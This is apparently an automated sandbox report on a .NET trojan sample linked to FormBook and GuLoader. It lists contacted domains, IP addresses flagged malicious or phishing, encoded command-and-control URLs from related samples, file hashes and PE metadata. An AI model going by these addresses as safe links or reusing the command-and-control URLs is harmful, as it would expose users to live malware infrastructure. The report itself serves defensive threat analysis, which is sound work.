http://www.starryallure.comReferer:	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controv	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.zg9tywlubmftzw5ldzi0mdm.comReferer:	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.nightoracle.com	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.cleaning-products-29334.bondReferer:	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.roundaboutlogistics.com/rs10/www.nightoracle.com	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.calm-plants.com/rs10/www.hdlive7.live	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
103.224.212.212	www.fhstbanknigeria.com	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
103.224.212.210	www.nightoracle.com	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
35.186.223.180	www.m-baer.com	United States	15169	GOOGLEUS	false
104.21.69.174	www.mtauratarnt.com	United States	13335	CLOUDFLARENETUS	true
104.247.82.51	www.robertjamesfineclothing.com	Canada	206834	TEAMINTERNET-CA-ASCA	true
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	true
3.33.130.190	totalkfood.com	United States	8987	AMAZONEXPANSIONGB	true
104.19.157.23	cname.beehiiv.com	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1331069
Start date and time:	2023-10-24 08:26:10 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	GCeHcfCef8.exe renamed because original name is a hash value
Original Sample Name:	841031a37159398b8eebca7bb7eff56b.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/1@10/8
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 126 Number of non-executed functions: 295
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:27:09	API Interceptor	2x Sleep call for process: GCeHcfCef8.exe modified
08:27:17	API Interceptor	7634111x Sleep call for process: explorer.exe modified
08:27:56	API Interceptor	7503728x Sleep call for process: cmmon32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
103.224.212.212	Audit_Confirmation_pdf.exe	Get hash	malicious	FormBook	Browse	www.brynnwpods.com/ls02/?U2MTG=IjLtFX-X1ru86jf&rrn=BOXRJAyFp7ak5hNUAxrCPIqjpri6yIqDhPKfVNEe46v/rpGYXPOMCZCFlinyM3iKXNZy
103.224.212.212	SWIFT_LETTER_A1OzGLOB0NH2.exe	Get hash	malicious	FormBook	Browse	www.brynnwpods.com/ls02/?GxoHR=VBjPa4VPhFxDNPj&_ZApkb=BOXRJAyFp7ak5hNUAxrCPIqjpri6yIqDhPKfVNEe46v/rpGYXPOMCZCFlhHtHXyyNqk4
103.224.212.210	3Fip115gvy.exe	Get hash	malicious	FormBook	Browse	www.amandaastburyillustration.com/4hc5/?5j=tFNxItah5B1Ppp8&1bYL=gSDqYeuNyx9e7kEHeYuvifh3Cjr1gIeW+4DcEpd4uqJRNoyOBBMvPYw4l031L02pmBQlOudiow==
	jU0hAXFL0k.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.nightoracle.com/rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=SxqHGPQaAl7yFZn58Kwa4D8rXi7vUXAn+pZ+h1ux2Xs7o9rzQOK5UHTSqMwI3eALG/2g
	DHL-081023.exe	Get hash	malicious	FormBook	Browse	www.joeysdoor.com/hesf/?APG0=swh0B3mpDGfIoIkFkBMBaZWoEXPEWkdnCE+a2KvQ5fM7xuJWfY5mF8tuq1PLwLxVobF5&MPkP=tV98bPH
104.21.69.174	Awb_tracking_receipt_0321202291319800000000000000.xlsx	Get hash	malicious	FormBook	Browse	www.48hoursdesigns.com/rzwo/?o6=CYsAWEeEFiYfI/tGu5WSuRheEZ4egY/IEPGJFt7GPAk6UMTjhL8YpIczGI6gkpvA1nGdJg==&e6A=3fsXGhB
104.21.69.174	UIHyK98B9o.exe	Get hash	malicious	FormBook	Browse	www.48hoursdesigns.com/rzwo/?f4=CYsAWEeBFlYbIvhKs5WSuRheEZ4egY/IEPeZZunHLgk7U9/lmbtU/MkxFu6m8I3I5Ry8Qb6uWA==&7nt8M=f6Al
104.247.82.51	jU0hAXFL0k.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.robertjamesfineclothing.com/rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=h9cyBphf9TZy/NiZOY7V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXowJmn7XnCFt
23.227.38.74	REF_03351.doc	Get hash	malicious	FormBook	Browse	www.euvexofficial.com/o5pf/?tD=9aI1YFFk4DHZUYOkZ3596HCeQC4lBtwqGeE+PDBVT619RxsGxwkZsphZUFBvgGf75d0Fyg==&QJB06r=YJBL_4XhHF
	file.exe	Get hash	malicious	FormBook	Browse	www.lilypaddesigns.net/ur25/?D6ql=O5zvqhT3r20qcpZxKsthuYcOsFbPQWrLBLvhbAYWoeFV+rVVf8vMu5EyAGvtkqnz/XowCBrz8A==&W0=NBg0uphHLPGDKlyP
	PAGO_72094.exe	Get hash	malicious	FormBook	Browse	www.hollamia.com/eg02/?yvF=MJB0J&iHf=Elvx7inJN+0OHz/RIfvhLUl1T5U3GxCk5u99p9BlmIngC2ZyhmNcRuZKuAEWV0qTl4rl
	PI_and_payment_confirmed_pdf.exe	Get hash	malicious	FormBook, DBatLoader	Browse	www.tuktukwines.com/n7ak/
	PO-AM2307586.doc	Get hash	malicious	FormBook, NSISDropper	Browse	www.mochibees-wylie.com/ge06/?9r549=hJkx0eH2QAKr/rM6zPsNviUHTBSqNLPfVhgpdMrR1UAGLx2aBw8r3vgSMp7elrAEYXkqhQ==&sDK=XrRD
	Quote_Request.exe	Get hash	malicious	FormBook	Browse	www.windbornecreations.com/5nd2/?O2J=AhpvgK6laQupWPxI3k6FuQt8ZuaKJ++nU9Tcv1SxwrOaN/SOaUnkkyNrcVdD5l/OGGvQ&nPqLWL=dXbHpJHPNrxDD
	Overdue_payment_settled.exe	Get hash	malicious	FormBook	Browse	www.laplumeuniverselle.com/k0p2/?8p44t=MvZszHfg/1YZXhmYIEXfE3E69GxEM6y9HfuQyTdzOeTnlzvVakVLhrynK/afiVLHB4PD&Qds=4hAhHVzPH2uL
	Orden_de_compra.exe	Get hash	malicious	FormBook	Browse	www.therealopulent.com/ey16/?RjA=3bcd3Y2FgCYeuy5Q6BY7uUBxxZoK+N98I8Sra2jBULM2pb+N/WFsUij82FsZzWsxf00EstPM0g==&lnrlk=yV4D_pFhK
	e-dekont.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.brewfitonline.com/dz01/?F6h4=NFNTaLlX&RfgL=pBlov/boaeHRhtLu7qKIGWmw3yivhA7+bl/lYrcgeIWenn1RoEoZOSFjikQK3u+Zz5uw
	mDZvZLTjGd.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.domumix.com/t6tg/?lhrd=NCr4hxu03uvSlYiwMfFe4UNVT4u8oc6t8RHvA0WXya/qusgW/qyO6dtLGnQF1ZmwUWZjoUkHpw==&1bj=3fe8C2hPtRCxtL
	WoDN7Q47dO.exe	Get hash	malicious	FormBook	Browse	www.hillstonetrade.com/o6g2/?DR-DOL=ixopsp0&kDKXx0V=0mflL6X/MbesGK2lnwmr8zuwXZV3n2b2TIjYGHzFIr1gp9tnrq5CHen/Y3BBgIIqMoIkpqtURQ==
	jU0hAXFL0k.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.laserhairremovalkit.com/rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=uoL10Qcd0eLYS7Ve2hB0LYPAWS6gq5lEHn4a3bybbvdgEh6IH9sFuMB9DUK4ZLPCWxvn
	Vdxer5qjIX.exe	Get hash	malicious	FormBook	Browse	www.familyfarmequipment.com/o6g2/?SBZ=nS9YWzFY3N6syAhbwoNBshoWv9LGSbS8x4bIAiF2evmS+jLDSfz0OyK3yknLqM4fqEnt&0rN8=9rNd98_pMt
	Order_No_455100.doc	Get hash	malicious	FormBook, NSISDropper	Browse	www.modeparisiennefr.com/ge06/?BRr=1PQ6+z1zCuhiDtNSfWRWHzULIaSgIyGLxvhKDe40IO1yU7fcEEkK65M/Vi7JoYmvOisiHg==&3f=-ZoLnTC
	4XiBSHVMK9.exe	Get hash	malicious	FormBook	Browse	www.easyhub.xyz/ur25/?yPJdZZPp=YgFlAXF+PF1M9NVblP9VwiavCVoYTH5qXsZlKIgMZf+jSBRRmW7+G4eG5ZtMpUZIxGFAPC2bwg==&1bz=ofut_N
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.9100.16087.rtf	Get hash	malicious	FormBook	Browse	www.menofthehouse.store/o5gu/?Cz=qg/YE8tbqUGHlX9yn/532/da1RukGVzt5a7itCgYWzzXcdUnknjh6ulO/lFtjuestBs3FA==&bFQ=Y488S8qhX
	Ordem_de_compra_#PO358.exe	Get hash	malicious	FormBook	Browse	www.casaalmafurniture.com/ey16/?xZED=gZ0vRgtzCg8Y9BjlioTXXGcpipSfchP6EsC108QsyUWTNpWLZXtls9A70lktVmrR4hUD&E8bHr=NjqDiB6XRrFpUP
	J7YKoy7RbeAhnI4.exe	Get hash	malicious	FormBook	Browse	www.easyhub.xyz/ur25/?EtxdAx=YgFlAXEKPlw8g9Iv5/9VwiavCVoYTH5qXsZlKIgMZf+jSBRRmW7+G4eG5aB2qV1zyxkR&JtO=ipj4fvRPCntLCLp
	Order_No_455100.doc	Get hash	malicious	FormBook, NSISDropper	Browse	www.mochibees-wylie.com/ge06/?efip3=hJkx0eH2QAKr/rM6zPsNviUHTBSqNLPfVhgpdMrR1UAGLx2aBw8r3vgSMp7elrAEYXkqhQ==&RfJ0=UP64Xzx04B
	SOA_OCT.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.speedgallery.shop/ro12/?Nj=q7bBtZk2sykpAEyGz2CbGdw5qDscegXZ29U5uCqOLaUnJObHOFuBSIyqgeyI0V5al5lx&sZ=mlbL

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.nightoracle.com	jU0hAXFL0k.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.224.212.210
www.mtauratarnt.com	jU0hAXFL0k.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.210.176
www.robertjamesfineclothing.com	jU0hAXFL0k.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.247.82.51
shops.myshopify.com	REF_03351.doc	Get hash	malicious	FormBook	Browse	23.227.38.74
	file.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	PAGO_72094.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	PI_and_payment_confirmed_pdf.exe	Get hash	malicious	FormBook, DBatLoader	Browse	23.227.38.74
	PO-AM2307586.doc	Get hash	malicious	FormBook, NSISDropper	Browse	23.227.38.74
	Quote_Request.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	Overdue_payment_settled.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	Orden_de_compra.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	e-dekont.exe	Get hash	malicious	FormBook, NSISDropper	Browse	23.227.38.74
	mDZvZLTjGd.exe	Get hash	malicious	FormBook, NSISDropper	Browse	23.227.38.74
	pdf-92837.xlsx	Get hash	malicious	Unknown	Browse	23.227.38.74
	WoDN7Q47dO.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	jU0hAXFL0k.exe	Get hash	malicious	FormBook, GuLoader	Browse	23.227.38.74
	Vdxer5qjIX.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	Order_No_455100.doc	Get hash	malicious	FormBook, NSISDropper	Browse	23.227.38.74
	4XiBSHVMK9.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	http://lovekizoar.live	Get hash	malicious	Unknown	Browse	23.227.38.74
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.9100.16087.rtf	Get hash	malicious	FormBook	Browse	23.227.38.74
	Ordem_de_compra_#PO358.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	J7YKoy7RbeAhnI4.exe	Get hash	malicious	FormBook	Browse	23.227.38.74

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TRELLIAN-AS-APTrellianPtyLimitedAU	PAGO_72094.exe	Get hash	malicious	FormBook	Browse	103.224.212.215
	Audit_Confirmation_pdf.exe	Get hash	malicious	FormBook	Browse	103.224.212.216
	HB-252-23.exe	Get hash	malicious	FormBook	Browse	103.224.212.217
	SWIFT_LETTER_A1OzGLOB0NH2.exe	Get hash	malicious	FormBook	Browse	103.224.212.212
	mDZvZLTjGd.exe	Get hash	malicious	FormBook, NSISDropper	Browse	103.224.212.215
	SecuriteInfo.com.FileRepMalware.795.18532.exe	Get hash	malicious	Unknown	Browse	103.224.212.214
	SecuriteInfo.com.FileRepMalware.795.18532.exe	Get hash	malicious	Unknown	Browse	103.224.212.214
	http://noblocking.net/wpad.dat?dd877e4571fab8981856b1f281cd158922628783	Get hash	malicious	Unknown	Browse	103.224.212.215
	Hubnnuiisapctu.exe	Get hash	malicious	DBatLoader, FormBook	Browse	103.224.212.213
	3Fip115gvy.exe	Get hash	malicious	FormBook	Browse	103.224.212.210
	jU0hAXFL0k.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.224.212.210
	XP1XNeOXU0.exe	Get hash	malicious	FormBook, DBatLoader	Browse	103.224.182.245
	http://oopatet.com/javascript/fingerprint/iife.min.js	Get hash	malicious	Unknown	Browse	103.224.182.206
	http://oopatet.com	Get hash	malicious	Unknown	Browse	103.224.182.16
	OwX3rXBIQT.exe	Get hash	malicious	FormBook, NSISDropper	Browse	103.224.212.214
	mi1w8A8qUH.exe	Get hash	malicious	FormBook, NSISDropper	Browse	103.224.182.252
	DHL-081023.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	http://www.sciencepub123.com/unsubscribe	Get hash	malicious	Unknown	Browse	103.224.182.240
	Payment_Advice.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	http://energie-charts.info	Get hash	malicious	Unknown	Browse	103.224.212.220
TRELLIAN-AS-APTrellianPtyLimitedAU	PAGO_72094.exe	Get hash	malicious	FormBook	Browse	103.224.212.215
	Audit_Confirmation_pdf.exe	Get hash	malicious	FormBook	Browse	103.224.212.216
	HB-252-23.exe	Get hash	malicious	FormBook	Browse	103.224.212.217
	SWIFT_LETTER_A1OzGLOB0NH2.exe	Get hash	malicious	FormBook	Browse	103.224.212.212
	mDZvZLTjGd.exe	Get hash	malicious	FormBook, NSISDropper	Browse	103.224.212.215
	SecuriteInfo.com.FileRepMalware.795.18532.exe	Get hash	malicious	Unknown	Browse	103.224.212.214
	SecuriteInfo.com.FileRepMalware.795.18532.exe	Get hash	malicious	Unknown	Browse	103.224.212.214
	http://noblocking.net/wpad.dat?dd877e4571fab8981856b1f281cd158922628783	Get hash	malicious	Unknown	Browse	103.224.212.215
	Hubnnuiisapctu.exe	Get hash	malicious	DBatLoader, FormBook	Browse	103.224.212.213
	3Fip115gvy.exe	Get hash	malicious	FormBook	Browse	103.224.212.210
	jU0hAXFL0k.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.224.212.210
	XP1XNeOXU0.exe	Get hash	malicious	FormBook, DBatLoader	Browse	103.224.182.245
	http://oopatet.com/javascript/fingerprint/iife.min.js	Get hash	malicious	Unknown	Browse	103.224.182.206
	http://oopatet.com	Get hash	malicious	Unknown	Browse	103.224.182.16
	OwX3rXBIQT.exe	Get hash	malicious	FormBook, NSISDropper	Browse	103.224.212.214
	mi1w8A8qUH.exe	Get hash	malicious	FormBook, NSISDropper	Browse	103.224.182.252
	DHL-081023.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	http://www.sciencepub123.com/unsubscribe	Get hash	malicious	Unknown	Browse	103.224.182.240
	Payment_Advice.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	http://energie-charts.info	Get hash	malicious	Unknown	Browse	103.224.212.220
CLOUDFLARENETUS	New_Order_enquiry.xla.xlsx	Get hash	malicious	AgentTesla, zgRAT	Browse	172.67.215.45
	Purchase_Order_022502_-_0002.xla.xlsx	Get hash	malicious	AgentTesla, zgRAT	Browse	104.21.45.138
	file.exe	Get hash	malicious	Djvu, Glupteba, RedLine, SmokeLoader, Xmrig	Browse	172.67.139.220
	REF_03351.doc	Get hash	malicious	FormBook	Browse	104.21.53.135
	Purchase_Order_A7.pdf.exe	Get hash	malicious	FormBook	Browse	172.64.151.154
	file.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	DUrtA5NJvAcOoYZ.exe	Get hash	malicious	AgentTesla	Browse	162.159.137.232
	Detalle_Productos.pdf.exe	Get hash	malicious	AgentTesla	Browse	162.159.135.233
	RFQ197539.exe	Get hash	malicious	Lokibot	Browse	172.67.177.101
	Ejosu6l7sg.exe	Get hash	malicious	ScreenConnect Tool, Amadey, Babadeda, Glupteba, LummaC Stealer, Mystic Stealer, RedLine	Browse	1.1.1.1
	saham.apk	Get hash	malicious	Irata	Browse	172.67.157.118
	https://dotsply.com	Get hash	malicious	Unknown	Browse	172.66.40.43
	http://ws4.eeccking.com/	Get hash	malicious	Unknown	Browse	172.67.223.181
	file.exe	Get hash	malicious	Djvu, Glupteba, RedLine, SmokeLoader, Xmrig	Browse	104.21.65.24
	https://ws1.ffaagive.com/	Get hash	malicious	Unknown	Browse	104.21.80.146
	https://steancommunlty.xyz/	Get hash	malicious	Unknown	Browse	172.67.222.152
	http://steamcommcounity.com/	Get hash	malicious	Unknown	Browse	104.18.42.105
	https://bathbimop.live/	Get hash	malicious	Unknown	Browse	104.18.31.76
	https://pub-b9821dd4ea52457ea254d1a23f8aa714.r2.dev/amexm.html	Get hash	malicious	HTMLPhisher	Browse	104.18.2.35
	https://co-ms.com/docusign-dseNa3onmicrosoftonline.html?	Get hash	malicious	HTMLPhisher	Browse	172.67.206.16

Process:	C:\Users\user\Desktop\GCeHcfCef8.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.4408479725072
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	GCeHcfCef8.exe
File size:	832'512 bytes
MD5:	841031a37159398b8eebca7bb7eff56b
SHA1:	1848cf9917341a151a4cd8c3ff041525a4d075eb
SHA256:	0ad9757a6895b3595b4eaa5a71cca88d658a1c21f335b8d3268949d659e27fda
SHA512:	703be883819631d73c3ecdaab42b73464b1e81072d68a665d551dcc393d3b2b002bf2929a6a9b1f1b17e6de352458bbffe6a7e24a463fe661549202b7bcf42d7
SSDEEP:	12288:TMGI/MtgR/mZRM+BYkElTBtzeACtg1Uf10nhLnxeTLE39oexn3SJ:p1gkZR5+k2Dk10nsL4eexn
TLSH:	D605BE6C27340245CA2963B6DCC6BD3423690FB962A5E7CB3DF57DD17A72B20D052A0E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,sG...............0..@...r......._... ...`....@.. ....................................@................................

File Icon


Icon Hash:	216d554c6451690d

Static PE Info

General

Entrypoint:	0x4a5f8a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xC947732C [Sun Jan 3 12:35:56 2077 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add eax, dword ptr [eax]
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax+0000000Eh], al
dec eax
add byte ptr [eax], al
adc byte ptr [eax], 00000000h
add byte ptr [eax], al
pushad
add byte ptr [eax], al
sbb byte ptr [eax], 00000000h
add byte ptr [eax], al
js 00007F954C911472h
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add dword ptr [eax], eax
add byte ptr [eax], al
nop
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa5f36	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa6000	0x26e10	.rsrc
